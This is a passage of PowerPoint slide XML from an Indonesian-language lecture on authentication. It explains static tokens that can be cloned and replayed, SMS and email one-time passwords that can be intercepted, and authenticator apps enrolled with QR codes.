              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> token statis yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diprogram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> statis. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kloning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemutaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10875618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Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> counter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kadaluarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> SMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> MFA. Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penyadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Token OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (QR) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
